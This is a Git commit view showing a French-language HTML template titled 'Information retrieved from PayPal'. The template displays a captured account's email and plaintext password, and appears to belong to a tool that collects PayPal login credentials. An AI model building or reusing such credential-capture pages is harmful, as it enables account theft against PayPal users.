first commit

This commit is contained in:
√(noham)²
2023-01-18 11:11:34 +01:00
commit 6c30975f67
39 changed files with 1082 additions and 0 deletions

21
templates/infopaypal.html Normal file
View File

@@ -0,0 +1,21 @@
{% extends 'template.html' %}
{% block title %}
Informations récupérées de PayPal
{% endblock %}
{% block content %}
<table id="fiche">
<tr>
<td>Email :</td>
<td>
<p>{{ account["email"] }}</p>
</td>
</tr>
<tr>
<td>Password :</td>
<td>{{ account["password"] }}</td>
</tr>
</table>
{% endblock %}